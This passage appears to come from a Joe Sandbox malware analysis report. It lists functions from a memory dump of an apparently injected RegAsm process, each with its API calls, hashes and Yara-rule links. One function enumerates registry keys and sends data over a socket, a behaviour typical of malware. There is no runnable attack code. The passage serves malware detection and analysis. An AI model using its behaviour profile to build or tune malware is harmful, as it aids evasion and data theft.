                                                                                              • GetSystemMetrics.USER32(0000004C), ref: 0041228E
                                                                                              • GetSystemMetrics.USER32(0000004D), ref: 00412294
                                                                                              • GetSystemMetrics.USER32(0000004E), ref: 0041229A
                                                                                              • GetSystemMetrics.USER32(0000004F), ref: 004122A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MetricsSystem
                                                                                              • String ID:
                                                                                              • API String ID: 4116985748-0
                                                                                              • Opcode ID: 053db17e7a6c52d0060b6f2d2fb2ff70657ecfa06d353a12bf392e0d8bad21fb
                                                                                              • Instruction ID: 89de0d755d70642537d1d436af62c14b4b11da7e22818bda6a47393979baae43
                                                                                              • Opcode Fuzzy Hash: 053db17e7a6c52d0060b6f2d2fb2ff70657ecfa06d353a12bf392e0d8bad21fb
                                                                                              • Instruction Fuzzy Hash: 7001AC71F002286BDB109FA9CC41A9D7B95DF44760F10406BEE0CEB340D9B8AD4047C8
                                                                                              Function 00414699 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000018,00000000), ref: 004146B1
                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000018,00000000), ref: 004146C4
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000018,00000000), ref: 004146EF
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000018,00000000), ref: 004146F7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandleOpenProcess
                                                                                              • String ID:
                                                                                              • API String ID: 39102293-0
                                                                                              • Opcode ID: 1af01056c3ae6bb1cb7cae0660ad155511764e7b69f07d9f8ce8de45e1cfa6e6
                                                                                              • Instruction ID: b8317d07de67e98f9920d3d33bcb499745fd15691e2d04bf827ba3f8c6195df7
                                                                                              • Opcode Fuzzy Hash: 1af01056c3ae6bb1cb7cae0660ad155511764e7b69f07d9f8ce8de45e1cfa6e6
                                                                                              • Instruction Fuzzy Hash: 98014E753002046BD61057545C49FFB736CDB8579AF000166FA88D2190EFAC8C81456E
                                                                                              Function 0042FA11 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0042FA28
                                                                                                • Part of subcall function 00430060: ___AdjustPointer.LIBCMT ref: 004300AA
                                                                                              • _UnwindNestedFrames.LIBCMT ref: 0042FA3F
                                                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 0042FA51
                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 0042FA75
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                              • String ID:
                                                                                              • API String ID: 2633735394-0
                                                                                              • Opcode ID: 3bc4621ae17e63219c49621585e226d06ab1c41b19007eb81c6da07df0bbe7b5
                                                                                              • Instruction ID: 46f6367602a7af8e8c080bc3d9db011f884b2cca7bf67df38f357a6d7b2bfad7
                                                                                              • Opcode Fuzzy Hash: 3bc4621ae17e63219c49621585e226d06ab1c41b19007eb81c6da07df0bbe7b5
                                                                                              • Instruction Fuzzy Hash: 1B011B32100118BBCF129F56DC05EDB7BB6FF48714F45812AF91862121C37AE865DB94
                                                                                              Function 0042E743 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 0042E743
                                                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0042E748
                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0042E74D
                                                                                                • Part of subcall function 00431D68: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00431D79
                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0042E762
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                              • String ID:
                                                                                              • API String ID: 1761009282-0
                                                                                              • Opcode ID: bc6d224e8d5b72e5f3cec7e581ad8da2a683ecd1731032797a77a3d4aa2a10c8
                                                                                              • Instruction ID: 553a3698c3aa90dbaf59acd9f5d3f90f695d611f681d1e27becbad91c9f45b66
                                                                                              • Opcode Fuzzy Hash: bc6d224e8d5b72e5f3cec7e581ad8da2a683ecd1731032797a77a3d4aa2a10c8
                                                                                              • Instruction Fuzzy Hash: 7FC04818604220512EA8BAB333032AE03000CEB3DDFE434CFACA5272239E0E340B603F
                                                                                              Function 00421E84 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _memcmp
                                                                                              • String ID: 01B
                                                                                              • API String ID: 2931989736-2242190220
                                                                                              • Opcode ID: 5fd4cb2f2eb6f2e596b517fbba611d9e39b9e3e279a93673eb84f45a6bccc248
                                                                                              • Instruction ID: b681089afacfdc10096d0b0687866a9e2916795602fd0264882fd2f37da336bc
                                                                                              • Opcode Fuzzy Hash: 5fd4cb2f2eb6f2e596b517fbba611d9e39b9e3e279a93673eb84f45a6bccc248
                                                                                              • Instruction Fuzzy Hash: F151B531B00626ABCB21CF6AEA80A6BF7B5FF54310F95812ADD5897320D735ED11CB84
                                                                                              Function 0040D72E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,?), ref: 0040D763
                                                                                                • Part of subcall function 0040D476: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 0040D4DD
                                                                                                • Part of subcall function 0040D476: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 0040D50C
                                                                                                • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                                                                              • RegCloseKey.ADVAPI32(?,00459594,00459594,0045962C,0045962C,00000071), ref: 0040D8B7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseEnumInfoOpenQuerysend
                                                                                              • String ID: X|F
                                                                                              • API String ID: 3114080316-2178643013
                                                                                              • Opcode ID: 1eed004b071fb2661832d28135a6be1c903714b6b2a52b3367965b57650ced07
                                                                                              • Instruction ID: 52a15b34a4ac20fa923b067356e63d5415b277d9ab81aa83f9cc7be8be0fef2c
                                                                                              • Opcode Fuzzy Hash: 1eed004b071fb2661832d28135a6be1c903714b6b2a52b3367965b57650ced07
                                                                                              • Instruction Fuzzy Hash: 5641AD71A002185ACB04F775DCA6AEE77649B91308F40817FF60A772D2EF781E89C65E
                                                                                              Function 00443D48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00443FA3,?,00000050,?,?,?,?,?), ref: 00443E23
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ACP$OCP
                                                                                              • API String ID: 0-711371036
                                                                                              • Opcode ID: a6acee0346e3f6ae40b400c22f75c3be6bc2a9de64828de0f4f71846a915cbd2
                                                                                              • Instruction ID: d655ddf23005c5a9f15a52119ce0e88508a13c35cbcc5d652d1131ff6491d290
                                                                                              • Opcode Fuzzy Hash: a6acee0346e3f6ae40b400c22f75c3be6bc2a9de64828de0f4f71846a915cbd2
                                                                                              • Instruction Fuzzy Hash: 3421C1A2E00101A6FB248E64D901B9B72A6EF54F57F668427F90AD7304E73ADF01C398
                                                                                              Function 00404F36 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDriveTypeA.KERNEL32(00000000,?,0000000A,00467C58,?), ref: 00404F58
                                                                                              • lstrlenA.KERNEL32(00000000,00000000,0000002D), ref: 00404FB4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DriveTypelstrlen
                                                                                              • String ID: HW@
                                                                                              • API String ID: 1700768220-49188713
                                                                                              • Opcode ID: 40dcda4e39f6a4a506deb1e49bef629affa3386828b738860e7e0b9726f5f8ee
                                                                                              • Instruction ID: b053ae4ecd666080b16dde0db474da89a2947785c19d13b690d771263e7a6f4c
                                                                                              • Opcode Fuzzy Hash: 40dcda4e39f6a4a506deb1e49bef629affa3386828b738860e7e0b9726f5f8ee
                                                                                              • Instruction Fuzzy Hash: 4A01C271A002156BCB04F775ED5A9AEB7689F95304F10003FFA06B21D1EFB85A45C799
                                                                                              Function 0043490A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004349A0
                                                                                              • GetLastError.KERNEL32(?,?), ref: 004349AE
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?), ref: 00434A09
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1717984340-0
                                                                                              • Opcode ID: db417f25f6f92e00efcf0fc15827a5cd8d80a02f931988234b875dda48a2efa7
                                                                                              • Instruction ID: cc1d80011ffea3f1df985999827adad67b7e2f370d91c135a993c9fa55757793
                                                                                              • Opcode Fuzzy Hash: db417f25f6f92e00efcf0fc15827a5cd8d80a02f931988234b875dda48a2efa7
                                                                                              • Instruction Fuzzy Hash: FE410935A00201AFDF219F65C844BFBBBA4EFCA310F1451AAF859572A1D738AD01C75C
                                                                                              Function 0040C9C0 Relevance: 5.1, APIs: 4, Instructions: 125COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 0040C9EE
                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 0040CAC3
                                                                                              • SetLastError.KERNEL32(0000007F), ref: 0040CADE
                                                                                              • SetLastError.KERNEL32(0000007E,?,0040CD60), ref: 0040CAF7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLastRead
                                                                                              • String ID:
                                                                                              • API String ID: 4100373531-0
                                                                                              • Opcode ID: db9137be8a35981e6591980c942ba5589716ffca3f2a32cd0978180f6a0b4dbf
                                                                                              • Instruction ID: 499532b790c8abcea526b823558a84bddce30115e00368c610d72d2e208af3f3
                                                                                              • Opcode Fuzzy Hash: db9137be8a35981e6591980c942ba5589716ffca3f2a32cd0978180f6a0b4dbf
                                                                                              • Instruction Fuzzy Hash: AD416671B00209DFDB24CF99D884B6AB7F5EF48310F10856AE506A7291EB78E801CF54